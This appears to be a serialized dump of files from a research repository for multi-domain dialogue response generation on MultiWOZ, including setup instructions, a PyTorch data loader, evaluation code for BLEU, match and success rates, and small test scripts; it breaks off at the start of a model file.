start\nIn repo directory:\n\n## Install the required packages\n- Using Conda:\n```console\ncd multiwoz-mdrg\nconda create --name multiwoz python=3.7 anaconda\nsource activate multiwoz\nconda install --file requirements.txt \nconda install pytorch torchvision -c pytorch\n``` \n\n## Preprocessing\nTo download and pre-process the data run:\n\n```python multiwoz/Create_delex_data.py```\n\n## For debugging\nTo debug train.py, you can add the following parameteres to save time\n--debug=True --emb_size=5 --hid_size_dec=5 --hid_size_enc=5 --hid_size_pol=5 --max_epochs=2\n\nTo debug test.py, the parameters are:\n--debug=True --no_models=2 --beam_width=2\n\n## Training\nTo train the model run:\n\n```python train.py [--args=value]```\n\nSome of these args include:\n\n```\n// hyperparamters for model learning\n--max_epochs : numbers of epochs\n--batch_size : numbers of turns per batch\n--lr_rate : initial learning rate\n--clip : size of clipping\n--l2_norm : l2-regularization weight\n--dropout : dropout rate\n--optim : optimization method\n\n// network structure\n--emb_size : word vectors emedding size\n--use_attn : whether to use attention\n--hid_size_enc : size of RNN hidden cell\n--hid_size_pol : size of policy hidden output\n--hid_size_dec : size of RNN hidden cell\n--cell_type : specify RNN type\n```\n\n## Testing\nTo evaluate the run:\n\n```python test.py [--args=value]```\n\n## Hyperparamters\n```\n// hyperparamters for model learning\n--max_epochs : 20\n--batch_size : 64\n--lr_rate : 0.005\n--clip : 5.0\n--l2_norm : 0.00001\n--dropout : 0.0\n--optim : Adam\n\n// network structure\n--emb_size : 50\n--use_attn : True\n--hid_size_enc : 150\n--hid_size_pol : 150\n--hid_size_dec : 150\n--cell_type : gru\n```\n" }, { "alpha_fraction": 0.6219512224197388, "alphanum_fraction": 0.6336160898208618, "avg_line_length": 48.625, "blob_id": "3e50d45cff8b79c7f96622e188c1aae41eccce5e", "content_id": "3949045fd22bc3332437b848805c232c213f84b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7544, "license_type": "no_license", "max_line_length": 161, "num_lines": 152, "path": "/utils/multiwoz_dataloader.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Function :\n@License : Copyright(C), ILPS group, Univeristy of Amsterdam\n@Author : Jiahuan Pei\n@Contact : [email protected]\n@Data: 2019-03-28\n\"\"\"\nimport torch\nimport nltk, sys\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset\nfrom utils.util import *\nimport json\nfrom utils.util import default_device\n\nclass MultiwozSingleDataset(Dataset):\n \"\"\"Custom data.Dataset compatible with data.DataLoader.\"\"\"\n def __init__(self, val_file, name, src_word2id, trg_word2id, intent_type=None, intent2index=None):\n \"\"\"Reads source and target sequences from txt files.\"\"\"\n self.val_file = val_file\n self.name = name # the name of json dialogue\n self.src_word2id = src_word2id\n self.trg_word2id = trg_word2id\n self.intent2index = intent2index\n self.intent_type = intent_type\n self.device = default_device # torch.device('cpu')\n self.input_tensor, self.target_tensor, self.bs_tensor, self.db_tensor, self.mask_tensor = self.SingleDialogueJSON2Tensors()\n self.datalen = self.__len__()\n\n def __getitem__(self, index): # data for one dialogue file\n \"\"\"Returns one data pair (source and target).\"\"\"\n input_tensor, target_tensor, bs_tensor, db_tensor = \\\n self.input_tensor[index], self.target_tensor[index], self.bs_tensor[index], self.db_tensor[index]\n mask_tensor = self.mask_tensor[index] if self.mask_tensor else None\n return input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor\n\n def __len__(self):\n return len(self.input_tensor)\n\n def input_word2index(self, index):\n if index in self.src_word2id:\n return self.src_word2id[index]\n else:\n return UNK_token\n\n def out_word2index(self, index):\n if index in self.trg_word2id:\n return self.trg_word2id[index]\n else:\n return UNK_token\n\n def SingleDialogueJSON2Tensors(self):\n val_file = self.val_file\n input_tensor = []; target_tensor = []; bs_tensor = []; db_tensor = []; mask_tensor = []\n for idx, (usr, sys, bs, db, acts) in enumerate(\n zip(val_file['usr'], val_file['sys'], val_file['bs'], val_file['db'], val_file['acts'])):\n tensor = [self.input_word2index(word) for word in usr.strip(' ').split(' ')] + [EOS_token] # models.input_word2index(word)\n input_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=self.device)) # .view(-1, 1))\n\n tensor = [self.out_word2index(word) for word in sys.strip(' ').split(' ')] + [EOS_token]\n target_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=self.device)) # .view(-1, 1)\n # target_tensor.append(torch.LongTensor(tensor)) # .view(-1, 1)\n\n bs_tensor.append([float(belief) for belief in bs])\n db_tensor.append([float(pointer) for pointer in db])\n\n # pp added: mask_i=0 if i_th it contains i_th intent\n if self.intent2index:\n tensor = torch.ones(len(self.intent2index), 1)\n # change acts & find index\n intent_type = self.intent_type\n if intent_type == 'domain':\n inds = [self.intent2index[act.split('-')[0]] for act in acts]\n elif intent_type == 'sysact':\n inds = [self.intent2index[act.split('-')[1]] for act in acts]\n elif intent_type == 'domain_act':\n inds = [self.intent2index[act] for act in acts] # the index of the chosen intents\n tensor[:][inds] = 0\n mask_tensor.append(torch.as_tensor(tensor, dtype=torch.uint8, device=self.device))\n\n return input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor # each one is a list of tensor\n\ndef collate_fn(data, device=default_device):\n \"\"\"Creates mini-batch tensors from the list of tuples\n \"\"\"\n # batch.sort(key=lambda x: len(x[1]), reverse=True)\n has_mask_tensor = True if data[0][-1] is not None else False\n input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor = zip(*data)\n\n input_tensor, input_lengths = padSequence(input_tensor)\n target_tensor, target_lengths = padSequence(target_tensor)\n bs_tensor = torch.as_tensor(bs_tensor, dtype=torch.float, device=device)\n db_tensor = torch.as_tensor(db_tensor, dtype=torch.float, device=device)\n mask_tensor = torch.stack(mask_tensor).permute((1, 0, 2)) if has_mask_tensor else None\n # mask_tensor = torch.stack(mask_tensor).permute((1, 0, 2)) if mask_tensor[0] and mask_tensor[0] != [] else None\n\n # data = input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor\n # if torch.cuda.is_available():\n # data = [data[i].cuda() if isinstance(data[i], torch.Tensor) else data[i] for i in range(len(data))]\n return input_tensor, input_lengths, target_tensor, target_lengths, bs_tensor, db_tensor, mask_tensor # tensors [batch_size, *]\n\ndef get_loader(file_path, src_word2id, trg_word2id, intent_type=None, intent2index=None, batch_size=1):\n \"\"\"Returns data loader for train in turn-level.\n \"\"\"\n dials = json.load(open(file_path))\n dataset_list = []\n for name in dials.keys():\n val_file = dials[name]\n # build a custom dataset\n dataset = MultiwozSingleDataset(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n dataset_list.append(dataset)\n datasets = ConcatDataset(dataset_list)\n # data loader for custome dataset\n data_loader = DataLoader(dataset=datasets,\n batch_size=batch_size,\n shuffle=True,\n num_workers=0,\n collate_fn=collate_fn)\n return data_loader\n\ndef get_loader_by_dialogue(val_file, name, src_word2id, trg_word2id, intent_type=None, intent2index=None):\n '''Return a dataloader for a full dialogue, the batch size is the len of the dialogue'''\n dataset = MultiwozSingleDataset(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n batch_size = len(dataset)\n data_loader = DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=False, # donnot change the order\n num_workers=0,\n collate_fn=collate_fn)\n return data_loader\n\ndef get_loader_by_full_dialogue(file_path, src_word2id, trg_word2id, intent_type=None, intent2index=None):\n '''Return a list of dataloader, each one load a full dialogue data'''\n dials = json.load(open(file_path))\n data_loader_list = []\n for name in dials.keys():\n val_file = dials[name]\n data_loader = get_loader_by_dialogue(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n data_loader_list.append(data_loader)\n return data_loader_list\n\nif __name__ == \"__main__\":\n data_dir = '../multiwoz1-moe/data'\n # intent_type = 'domain'\n intent_type = None\n input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = loadDictionaries(mdir=data_dir)\n intent2index, index2intent = loadIntentDictionaries(intent_type=intent_type, intent_file='{}/intents.json'.format(data_dir)) if intent_type else (None, None)\n file_path = '{}/train_dials.json'.format(data_dir)\n train_loader = get_loader(file_path, input_lang_word2index, output_lang_word2index, intent_type, intent2index)\n for data in train_loader:\n print(data)\n\n" }, { "alpha_fraction": 0.7092198729515076, "alphanum_fraction": 0.716312050819397, "avg_line_length": 27.399999618530273, "blob_id": "c555dca22a319d01c6283413f935c3ce8e51b5ea", "content_id": "50aed7d4d2c26a15461aa9219142b99596bff514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 141, "license_type": "no_license", "max_line_length": 49, "num_lines": 5, "path": "/test.sh", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nmkdir -p logs\nsource activate multiwoz\nTIMESTAMP=`date \"+%Y%m%d%H%M%S\"`\npython2 -u test.py >> logs/laptop-$TIMESTAMP.test" }, { "alpha_fraction": 0.5254557132720947, "alphanum_fraction": 0.5391807556152344, "avg_line_length": 39.620208740234375, "blob_id": "1b3afb46d21aba2ac0b847dd4c21c6fb555d6d5d", "content_id": "da92de96cd3678fcd94a2b48f1192540baedb081", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23315, "license_type": "no_license", "max_line_length": 147, "num_lines": 574, "path": "/models/evaluator.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "import random\nimport sys\nsys.path.append('..')\nrandom.seed(111)\n\nfrom utils.dbPointer import queryResultVenues\nfrom utils.delexicalize import *\nfrom utils.nlp import *\n\ndomains = ['restaurant', 'hotel', 'attraction', 'train', 'taxi', 'hospital', 'police']\nrequestables = ['phone', 'address', 'postcode', 'reference', 'id']\n\n\ndef parseGoal(goal, d, domain):\n \"\"\"Parses user goal into dictionary format.\"\"\"\n goal[domain] = {}\n goal[domain] = {'informable': [], 'requestable': [], 'booking': []}\n if 'info' in d['goal'][domain]:\n if domain == 'train':\n # we consider dialogues only where train had to be booked!\n if 'book' in d['goal'][domain]:\n goal[domain]['requestable'].append('reference')\n if 'reqt' in d['goal'][domain]:\n if 'trainID' in d['goal'][domain]['reqt']:\n goal[domain]['requestable'].append('id')\n else:\n if 'reqt' in d['goal'][domain]:\n for s in d['goal'][domain]['reqt']: # addtional requests:\n if s in ['phone', 'address', 'postcode', 'reference', 'id']:\n # ones that can be easily delexicalized\n goal[domain]['requestable'].append(s)\n if 'book' in d['goal'][domain]:\n goal[domain]['requestable'].append(\"reference\")\n\n goal[domain][\"informable\"] = d['goal'][domain]['info']\n if 'book' in d['goal'][domain]:\n goal[domain][\"booking\"] = d['goal'][domain]['book']\n\n return goal\n\n# dialouges is a dict of list, each list consists of generated responses\ndef evaluateModel(dialogues, val_dials, delex_path, mode='Valid'):\n \"\"\"Gathers statistics for the whole sets.\"\"\"\n fin1 = open(delex_path, 'r')\n delex_dialogues = json.load(fin1)\n successes, matches = 0, 0\n total = 0\n\n gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n sng_gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0, 0],\n 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n for filename, dial in dialogues.items():\n data = delex_dialogues[filename]\n\n goal, _, _, requestables, _ = evaluateRealDialogue(data, filename) # ground truth\n\n success, match, stats = evaluateGeneratedDialogue(dial, goal, data, requestables)\n\n successes += success\n matches += match\n total += 1\n\n for domain in gen_stats.keys():\n gen_stats[domain][0] += stats[domain][0]\n gen_stats[domain][1] += stats[domain][1]\n gen_stats[domain][2] += stats[domain][2]\n\n if 'SNG' in filename:\n for domain in gen_stats.keys():\n sng_gen_stats[domain][0] += stats[domain][0]\n sng_gen_stats[domain][1] += stats[domain][1]\n sng_gen_stats[domain][2] += stats[domain][2]\n\n # BLUE SCORE\n corpus = []\n model_corpus = []\n bscorer = BLEUScorer()\n\n count_wrong_len = 0\n for dialogue in dialogues:\n data = val_dials[dialogue]\n model_turns, corpus_turns = [], []\n for idx, turn in enumerate(data['sys']):\n corpus_turns.append([turn])\n for turn in dialogues[dialogue]:\n model_turns.append([turn])\n\n if len(model_turns) == len(corpus_turns):\n corpus.extend(corpus_turns)\n model_corpus.extend(model_turns)\n else:\n count_wrong_len += 1\n print('wrong length!!!')\n # print(model_turns)\n if count_wrong_len:\n print('count_wrong_len_ratio={}/{}'.format(count_wrong_len, len(dialogues)))\n # Print results\n try:\n BLEU = bscorer.score(model_corpus, corpus)\n MATCHES = (matches / float(total) * 100)\n SUCCESS = (successes / float(total) * 100)\n SCORE = 0.5 * MATCHES + 0.5 * SUCCESS + 100 * BLEU\n print('%s BLEU: %.4f' % (mode, BLEU))\n print('%s Matches: %2.2f%%' % (mode, MATCHES))\n print('%s Success: %2.2f%%' % (mode, SUCCESS))\n print('%s Score: %.4f' % (mode, SCORE))\n print('%s Dialogues: %s' % (mode, total))\n return BLEU, MATCHES, SUCCESS, SCORE, total\n except:\n print('SCORE ERROR')\n\ndef evaluateModelOnIntent(dialogues, val_dials, delex_path, intent, mode='Valid'):\n \"\"\"Gathers statistics for the whole sets.\"\"\"\n try:\n fin1 = open(delex_path, 'r')\n except:\n print('cannot find the delex file!=', delex_path)\n delex_dialogues = json.load(fin1)\n successes, matches = 0, 0\n total = 0\n total_turns = 0\n total_dials = 0\n\n gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n sng_gen_stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0, 0],\n 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n for filename, dial in dialogues.items():\n data = delex_dialogues[filename]\n\n goal, _, _, requestables, _ = evaluateRealDialogue(data, filename)\n\n # filter goal & requestbles using domain\n new_goal = {}; new_req = {}\n for g in goal:\n if intent.lower() in g:\n new_goal[g] = goal[g]\n for r in requestables:\n if intent.lower() in r:\n new_req[r]=requestables[r]\n\n success, match, stats = evaluateGeneratedDialogue(dial, new_goal, data, new_req)\n\n successes += success\n matches += match\n total += 1\n\n\n for domain in gen_stats.keys():\n gen_stats[domain][0] += stats[domain][0]\n gen_stats[domain][1] += stats[domain][1]\n gen_stats[domain][2] += stats[domain][2]\n\n\n if 'SNG' in filename:\n for domain in gen_stats.keys():\n sng_gen_stats[domain][0] += stats[domain][0]\n sng_gen_stats[domain][1] += stats[domain][1]\n sng_gen_stats[domain][2] += stats[domain][2]\n\n # BLUE SCORE\n corpus = []\n model_corpus = []\n bscorer = BLEUScorer()\n\n count_wrong_len = 0\n for dialogue in dialogues:\n data = val_dials[dialogue]\n model_turns, corpus_turns = [], []\n flag = False\n if len(data['sys']) == len(dialogues[dialogue]):\n for idx, turn in enumerate(data['sys']):\n act = data['acts'][idx] # for different intents\n holding_intents = [a.split('-')[0] for a in act]\n model_turn = dialogues[dialogue][idx]\n if intent in holding_intents:\n corpus_turns.append([turn])\n model_turns.append([model_turn])\n total_turns += 1\n flag = True\n corpus.extend(corpus_turns)\n model_corpus.extend(model_turns)\n else:\n count_wrong_len += 1\n print('wrong length!!!')\n\n if flag:\n total_dials +=1\n\n if count_wrong_len:\n print('count_wrong_len_ratio={}/{}'.format(count_wrong_len, len(dialogues)))\n # Print results\n try:\n BLEU = bscorer.score(model_corpus, corpus)\n MATCHES = (matches / float(total) * 100)\n SUCCESS = (successes / float(total) * 100)\n SCORE = 0.5 * MATCHES + 0.5 * SUCCESS + 100 * BLEU\n print('%s BLEU: %.4f' % (mode, BLEU))\n print('%s Matches: %2.2f%%' % (mode, MATCHES))\n print('%s Success: %2.2f%%' % (mode, SUCCESS))\n print('%s Score: %.4f' % (mode, SCORE))\n print('%s Dialogues: %s' % (mode, total_dials))\n print('%s Turns: %s' % (mode, total_turns))\n return BLEU, MATCHES, SUCCESS, SCORE, total\n except:\n print('SCORE ERROR')\n\ndef evaluateGeneratedDialogue(dialog, goal, realDialogue, real_requestables):\n \"\"\"Evaluates the dialogue created by the models.\n First we load the user goal of the dialogue, then for each turn\n generated by the system we look for key-words.\n For the Inform rate we look whether the entity was proposed.\n For the Success rate we look for requestables slots\"\"\"\n # for computing corpus success\n requestables = ['phone', 'address', 'postcode', 'reference', 'id']\n\n # CHECK IF MATCH HAPPENED\n provided_requestables = {}\n venue_offered = {}\n domains_in_goal = []\n\n for domain in goal.keys():\n venue_offered[domain] = []\n provided_requestables[domain] = []\n domains_in_goal.append(domain)\n\n for t, sent_t in enumerate(dialog):\n for domain in goal.keys():\n # for computing success\n if '[' + domain + '_name]' in sent_t or '_id' in sent_t:\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n # HERE YOU CAN PUT YOUR BELIEF STATE ESTIMATION\n venues = queryResultVenues(domain, realDialogue['log'][t*2 + 1])\n\n # if venue has changed\n if len(venue_offered[domain]) == 0 and venues:\n venue_offered[domain] = random.sample(venues, 1)\n else:\n flag = False\n for ven in venues:\n if venue_offered[domain][0] == ven:\n flag = True\n break\n if not flag and venues: # sometimes there are no results so sample won't work\n # print venues\n venue_offered[domain] = random.sample(venues, 1)\n else: # not limited so we can provide one\n venue_offered[domain] = '[' + domain + '_name]'\n\n # ATTENTION: assumption here - we didn't provide phone or address twice! etc\n for requestable in requestables:\n if requestable == 'reference':\n if domain + '_reference' in sent_t:\n if 'restaurant_reference' in sent_t:\n if realDialogue['log'][t * 2]['db_pointer'][-5] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n elif 'hotel_reference' in sent_t:\n if realDialogue['log'][t * 2]['db_pointer'][-3] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n elif 'train_reference' in sent_t:\n if realDialogue['log'][t * 2]['db_pointer'][-1] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n else:\n provided_requestables[domain].append('reference')\n else:\n if domain + '_' + requestable + ']' in sent_t:\n provided_requestables[domain].append(requestable)\n\n # if name was given in the task\n for domain in goal.keys():\n # if name was provided for the user, the match is being done automatically\n if 'info' in realDialogue['goal'][domain]:\n if 'name' in realDialogue['goal'][domain]['info']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n # special domains - entity does not need to be provided\n if domain in ['taxi', 'police', 'hospital']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n\n if domain == 'train':\n if not venue_offered[domain]:\n if 'reqt' in realDialogue['goal'][domain] and 'id' not in realDialogue['goal'][domain]['reqt']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n \"\"\"\n Given all inform and requestable slots\n we go through each domain from the user goal\n and check whether right entity was provided and\n all requestable slots were given to the user.\n The dialogue is successful if that's the case for all domains.\n \"\"\"\n # HARD EVAL\n stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n match = 0\n success = 0\n # MATCH\n for domain in goal.keys():\n match_stat = 0\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n goal_venues = queryResultVenues(domain, goal[domain]['informable'], real_belief=True)\n if type(venue_offered[domain]) is str and '_name' in venue_offered[domain]:\n match += 1\n match_stat = 1\n elif len(venue_offered[domain]) > 0 and venue_offered[domain][0] in goal_venues:\n match += 1\n match_stat = 1\n else:\n if domain + '_name]' in venue_offered[domain]:\n match += 1\n match_stat = 1\n\n stats[domain][0] = match_stat\n stats[domain][2] = 1\n\n if match == len(goal.keys()):\n match = 1\n else:\n match = 0\n\n # SUCCESS\n if match:\n for domain in domains_in_goal:\n success_stat = 0\n domain_success = 0\n if len(real_requestables[domain]) == 0:\n success += 1\n success_stat = 1\n stats[domain][1] = success_stat\n continue\n # if values in sentences are super set of requestables\n for request in set(provided_requestables[domain]):\n if request in real_requestables[domain]:\n domain_success += 1\n\n if domain_success >= len(real_requestables[domain]):\n success += 1\n success_stat = 1\n\n stats[domain][1] = success_stat\n\n # final eval\n if success >= len(real_requestables):\n success = 1\n else:\n success = 0\n\n #rint requests, 'DIFF', requests_real, 'SUCC', success\n return success, match, stats\n\ndef evaluateRealDialogue(dialog, filename):\n \"\"\"Evaluation of the real dialogue.\n First we loads the user goal and then go through the dialogue history.\n Similar to evaluateGeneratedDialogue above.\"\"\"\n domains = ['restaurant', 'hotel', 'attraction', 'train', 'taxi', 'hospital', 'police']\n requestables = ['phone', 'address', 'postcode', 'reference', 'id']\n\n # get the list of domains in the goal\n domains_in_goal = []\n goal = {}\n for domain in domains:\n if dialog['goal'][domain]:\n goal = parseGoal(goal, dialog, domain)\n domains_in_goal.append(domain)\n\n # compute corpus success\n real_requestables = {}\n provided_requestables = {}\n venue_offered = {}\n for domain in goal.keys():\n provided_requestables[domain] = []\n venue_offered[domain] = []\n real_requestables[domain] = goal[domain]['requestable']\n\n # iterate each turn\n m_targetutt = [turn['text'] for idx, turn in enumerate(dialog['log']) if idx % 2 == 1]\n for t in range(len(m_targetutt)):\n for domain in domains_in_goal:\n sent_t = m_targetutt[t]\n # for computing match - where there are limited entities\n if domain + '_name' in sent_t or '_id' in sent_t:\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n # HERE YOU CAN PUT YOUR BELIEF STATE ESTIMATION\n venues = queryResultVenues(domain, dialog['log'][t * 2 + 1])\n\n # if venue has changed\n if len(venue_offered[domain]) == 0 and venues:\n venue_offered[domain] = random.sample(venues, 1)\n else:\n flag = False\n for ven in venues:\n if venue_offered[domain][0] == ven:\n flag = True\n break\n if not flag and venues: # sometimes there are no results so sample won't work\n #print venues\n venue_offered[domain] = random.sample(venues, 1)\n else: # not limited so we can provide one\n venue_offered[domain] = '[' + domain + '_name]'\n\n for requestable in requestables:\n # check if reference could be issued\n if requestable == 'reference':\n if domain + '_reference' in sent_t:\n if 'restaurant_reference' in sent_t:\n if dialog['log'][t * 2]['db_pointer'][-5] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n elif 'hotel_reference' in sent_t:\n if dialog['log'][t * 2]['db_pointer'][-3] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n #return goal, 0, match, real_requestables\n elif 'train_reference' in sent_t:\n if dialog['log'][t * 2]['db_pointer'][-1] == 1: # if pointer was allowing for that?\n provided_requestables[domain].append('reference')\n\n else:\n provided_requestables[domain].append('reference')\n else:\n if domain + '_' + requestable in sent_t:\n provided_requestables[domain].append(requestable)\n\n # offer was made?\n for domain in domains_in_goal:\n # if name was provided for the user, the match is being done automatically\n if 'info' in dialog['goal'][domain]:\n if 'name' in dialog['goal'][domain]['info']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n # special domains - entity does not need to be provided\n if domain in ['taxi', 'police', 'hospital']:\n venue_offered[domain] = '[' + domain + '_name]'\n\n # if id was not requested but train was found we dont want to override it to check if we booked the right train\n if domain == 'train' and (not venue_offered[domain] and 'id' not in goal['train']['requestable']):\n venue_offered[domain] = '[' + domain + '_name]'\n\n # HARD (0-1) EVAL\n stats = {'restaurant': [0, 0, 0], 'hotel': [0, 0, 0], 'attraction': [0, 0, 0], 'train': [0, 0,0], 'taxi': [0, 0, 0],\n 'hospital': [0, 0, 0], 'police': [0, 0, 0]}\n\n match, success = 0, 0\n # MATCH\n for domain in goal.keys():\n match_stat = 0\n if domain in ['restaurant', 'hotel', 'attraction', 'train']:\n goal_venues = queryResultVenues(domain, dialog['goal'][domain]['info'], real_belief=True)\n #print(goal_venues)\n if type(venue_offered[domain]) is str and '_name' in venue_offered[domain]:\n match += 1\n match_stat = 1\n elif len(venue_offered[domain]) > 0 and venue_offered[domain][0] in goal_venues:\n match += 1\n match_stat = 1\n\n else:\n if domain + '_name' in venue_offered[domain]:\n match += 1\n match_stat = 1\n\n stats[domain][0] = match_stat\n stats[domain][2] = 1\n\n if match == len(goal.keys()):\n match = 1\n else:\n match = 0\n\n # SUCCESS\n if match:\n for domain in domains_in_goal:\n domain_success = 0\n success_stat = 0\n if len(real_requestables[domain]) == 0:\n # check that\n success += 1\n success_stat = 1\n stats[domain][1] = success_stat\n continue\n # if values in sentences are super set of requestables\n for request in set(provided_requestables[domain]):\n if request in real_requestables[domain]:\n domain_success += 1\n\n if domain_success >= len(real_requestables[domain]):\n success +=1\n success_stat = 1\n\n stats[domain][1] = success_stat\n\n # final eval\n if success >= len(real_requestables):\n success = 1\n else:\n success = 0\n\n return goal, success, match, real_requestables, stats\n\ndef evaluateModelGivenFile(gen_path, ref_path):\n with open(ref_path, 'r') as ref, open(gen_path, 'r') as gen:\n ref_dialogues = json.load(ref)\n gen_dialogues = {}\n for k, v in json.load(gen).items():\n gen_dialogues[k] = v['sys']\n delex_path = 'data/multi-woz/delex.json'\n evaluateModel(gen_dialogues, ref_dialogues, delex_path, mode='Test')\n return\n\n# use the open source evaluation for nlg-eval https://github.com/Maluuba/nlg-eval\ndef evaluateNLG(gen_dials, ref_dialogues):\n hyp_list, ref_list = [], []\n for fname in gen_dials:\n hyp_list.extend(gen_dials[fname]) # list of sentence string\n ref_list.extend([s.strip() for s in ref_dialogues[fname]['sys']]) # list of ref_list, each ref_list is a list of sentence string\n ref_lists = [ref_list] # only put 1 reference\n\n from nlgeval import NLGEval\n nlgeval = NLGEval() # loads the models\n metrics_dict = nlgeval.compute_metrics(ref_list=ref_lists, hyp_list=hyp_list)\n print(metrics_dict)\n return metrics_dict\n\ndef evaluateNLGFile(gen_dials_fpath, ref_dialogues_fpath):\n with open(gen_dials_fpath, 'r') as gen, open(ref_dialogues_fpath, 'r') as ref:\n gen_dials = json.load(gen)\n ref_dialogues = json.load(ref)\n\n hyp_list, ref_list = [], []\n for fname in gen_dials:\n hyp_list.extend(gen_dials[fname]) # list of sentence string\n ref_list.extend([s.strip() for s in ref_dialogues[fname]['sys']]) # list of ref_list, each ref_list is a list of sentence string\n ref_lists = [ref_list] # only put 1 reference\n\n from nlgeval import NLGEval\n nlgeval = NLGEval() # loads the models\n metrics_dict = nlgeval.compute_metrics(ref_list=ref_lists, hyp_list=hyp_list)\n print(metrics_dict)\n return metrics_dict\n\ndef evaluateNLGFiles(gen_dials_fpaths, ref_dialogues_fpath):\n from nlgeval import NLGEval\n nlgeval = NLGEval() # loads the models\n\n with open(ref_dialogues_fpath, 'r') as ref:\n ref_dialogues = json.load(ref)\n\n for path in gen_dials_fpaths:\n with open(path, 'r') as gen:\n gen_dials = json.load(gen)\n\n hyp_list, ref_list = [], []\n for fname in gen_dials:\n hyp_list.extend(gen_dials[fname]) # list of sentence string\n ref_list.extend([s.strip() for s in ref_dialogues[fname]['sys']]) # list of ref_list, each ref_list is a list of sentence string\n ref_lists = [ref_list] # only put 1 reference\n\n metrics_dict = nlgeval.compute_metrics(ref_list=ref_lists, hyp_list=hyp_list)\n print(path)\n print(metrics_dict)\n\nif __name__ == '__main__':\n pass\n # evaluteNLGFiles(gen_dials_fpath='results/bsl_20190510161309/data/test_dials/test_dials_gen.json', ref_dialogues_fpath='data/test_dials.json')" }, { "alpha_fraction": 0.6478751301765442, "alphanum_fraction": 0.677363395690918, "avg_line_length": 31, "blob_id": "86b9081630fa62e582d921bd3cd60e374eb75650", "content_id": "41084fd15a16e39130727f852a24a5332b961ba6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1153, "license_type": "no_license", "max_line_length": 85, "num_lines": 35, "path": "/multiwoz/Test.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "from multiwoz.Evaluators import *\r\n\r\nrandom.seed(1)\r\n\r\n# diag={}\r\n# for filename, dialogues in json.load(open('data/test_dials.json')).items():\r\n# diag[filename] = dialogues['sys']\r\n# evaluateModel(diag, json.load(open('data/test_dials.json')), mode='test')\r\n\r\nevaluator=MultiWozEvaluator('MultiWozEvaluator')\r\n\r\ndiag={}\r\n# for filename, dialogues in evaluator.delex_dialogues.items():\r\n# one_diag=[]\r\n# for t, sent_t in enumerate(dialogues['log']):\r\n# if t%2==1:\r\n# one_diag.append(sent_t['text'])\r\n# diag[filename]=one_diag\r\n\r\n# print(evaluator.evaluate_match_success(evaluator.delex_dialogues, mode='rollout'))\r\n# random.seed(1)\r\n\r\nfor filename, dialogues in json.load(open('data/multi-woz/test_dials.json')).items():\r\n diag[filename] = dialogues['sys']\r\nevaluator.summarize_report(diag)\r\n\r\npath_bsl = 'results/test_dials_gen(bsl_m2_20190510161318).json'\r\npath_moe = 'results/test_dials_gen(moe1_20190510165545).json'\r\nwith open(path_bsl) as fr:\r\n print(path_bsl)\r\n evaluator.summarize_report(json.load(fr))\r\n\r\nwith open(path_moe) as fr:\r\n print(path_moe)\r\n evaluator.summarize_report(json.load(fr))" }, { "alpha_fraction": 0.5650963187217712, "alphanum_fraction": 0.5758068561553955, "avg_line_length": 46.17545700073242, "blob_id": "e11d5021f3e3159d2cd140da2b99aebce4f73b7e", "content_id": "aa9d63ec3e7b5eab292638af60ffc216b979ab1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49204, "license_type": "no_license", "max_line_length": 208, "num_lines": 1043, "path": "/models/model.py", "repo_name": "Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "from __future__ import division, print_function, unicode_literals\n\nimport json\nimport math\nimport operator\nimport os\nimport random\nfrom io 